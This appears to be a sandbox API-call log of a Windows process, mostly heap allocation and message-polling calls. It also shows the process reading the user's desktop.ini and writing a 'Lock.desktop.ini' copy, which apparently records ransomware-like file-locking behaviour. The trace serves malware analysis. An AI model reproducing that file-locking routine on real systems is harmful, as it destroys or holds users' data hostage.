[0163.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0163.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0163.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0163.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0163.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0163.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0163.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0163.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0163.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0163.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0163.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0163.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0163.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0163.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0163.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0163.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0163.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0163.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0163.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0163.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0163.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0163.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0163.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0163.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0163.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0163.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0163.649] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0163.649] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.649] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.649] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0163.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0163.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0163.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0163.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0163.649] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0163.649] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0163.649] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0163.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0163.650] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0163.650] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.650] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0163.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0163.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0163.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0163.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0163.650] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/Lock.desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lock.desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0163.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0163.651] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0163.651] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.652] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0163.652] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0163.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0163.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0163.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0163.652] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0163.652] ReadFile (in: hFile=0x1e8, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x11a, lpOverlapped=0x0) returned 1 [0163.653] ReadFile (in: hFile=0x1e8, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0163.653] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0163.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0163.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0163.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0163.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0163.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11a) returned 0x2416270 [0163.653] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0163.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0163.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0163.653] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0163.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0163.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0163.653] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0163.653] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0163.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0163.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0163.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0163.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0163.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0163.654] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0163.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0163.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0163.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0163.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0163.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0163.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0163.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0163.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0163.654] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0163.654] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0163.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0163.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0163.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0163.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0163.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0163.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0163.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0163.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0163.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0163.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0163.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0163.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0163.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0163.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0163.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0163.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0163.655] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0163.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0163.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0163.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0163.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0163.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0163.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0163.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0163.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0163.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0163.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0163.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0163.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0163.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0163.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0163.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0163.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0163.656] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0163.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0163.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0163.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0163.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0163.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0163.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0163.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0163.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0163.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0163.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0163.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0163.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0163.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0163.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0163.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0163.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0163.656] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0163.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0163.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0163.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0163.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0163.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0163.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0163.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0163.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0163.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0070 [0163.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0163.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0163.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0163.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0163.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0163.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0163.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0163.657] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0163.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0163.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0163.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0163.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0163.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0163.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0163.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0163.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0163.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0163.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0163.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0163.658] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.658] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0163.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0163.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0163.658] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0163.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0163.658] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0163.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0163.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0163.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0163.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0163.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0163.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0163.658] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0163.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0163.659] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0163.659] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0163.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0163.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.659] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0163.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0163.659] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0163.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0163.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0163.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0163.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0163.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0163.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0163.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.659] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0163.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 